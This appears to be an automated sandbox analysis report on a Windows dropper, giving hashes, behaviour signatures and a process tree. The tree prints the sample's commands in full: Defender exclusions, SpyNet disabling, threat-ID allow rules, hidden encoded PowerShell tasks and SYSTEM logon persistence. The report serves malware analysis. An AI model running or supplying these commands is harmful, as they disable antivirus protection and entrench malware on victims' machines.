Analysis
-
max time kernel
122s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
-
submitted
06-02-2023 23:34
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
2a394e4469901863d1e0ba494b73af77
-
SHA1
7dca5a43f451705c80ca73aba9f97b21e1a78c6a
-
SHA256
d423233f708e0af70448c973ff07ab25c072a1fe01006ea47ea664c3d371a3ed
-
SHA512
a160fff21bc7faef45fa2185ed854e3223ba6232b01761815e7ab8c6775b77b84989799b6702f87ea21e3dd0ca811111a9963b177529d61131d9b392cbd0acd6
-
SSDEEP
196608:91OIM6e41Qo8DYFol79VtoicAk9YuxSCS/pDF5YwERvq6:3Op141Qo2c+xVt9oY4/SP5YwCq6
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Drops file in System32 directory 27 IoCs
-
Drops file in Program Files directory 14 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 44 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS9CF0.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS9FDE.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxyWKknki" /SC once /ST 00:28:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxyWKknki"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxyWKknki"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bCfEGNwGDQwhWneLvC" /SC once /ST 00:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\ChQsEQNyswpenHU\FdzMbCA.exe\" pb /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\ChQsEQNyswpenHU\FdzMbCA.exeC:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\ChQsEQNyswpenHU\FdzMbCA.exe pb /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FpvksngNCKIjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FpvksngNCKIjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QqSrWmvdGtwU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QqSrWmvdGtwU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RIuAFuLLU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RIuAFuLLU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cfvymemHCAUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cfvymemHCAUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BekoRFZthbLHeaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BekoRFZthbLHeaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\jUlWXsHGbnJNPdLP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\jUlWXsHGbnJNPdLP\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FpvksngNCKIjC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FpvksngNCKIjC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FpvksngNCKIjC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QqSrWmvdGtwU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QqSrWmvdGtwU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RIuAFuLLU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RIuAFuLLU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cfvymemHCAUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cfvymemHCAUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BekoRFZthbLHeaVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BekoRFZthbLHeaVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\jUlWXsHGbnJNPdLP /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\jUlWXsHGbnJNPdLP /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxcCBvxEn" /SC once /ST 00:21:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxcCBvxEn"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxcCBvxEn"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cfFFKgQyvKFYWQGgS" /SC once /ST 00:16:39 /RU "SYSTEM" /TR "\"C:\Windows\Temp\jUlWXsHGbnJNPdLP\oqHWkXuwqeQQHza\aTeDbPf.exe\" lH /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "cfFFKgQyvKFYWQGgS"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\jUlWXsHGbnJNPdLP\oqHWkXuwqeQQHza\aTeDbPf.exeC:\Windows\Temp\jUlWXsHGbnJNPdLP\oqHWkXuwqeQQHza\aTeDbPf.exe lH /site_id 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bCfEGNwGDQwhWneLvC"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RIuAFuLLU\qIsntF.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qcUOvNLqmSmqpxF" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qcUOvNLqmSmqpxF2" /F /xml "C:\Program Files (x86)\RIuAFuLLU\hWSTyae.xml" /RU "SYSTEM"2⤵
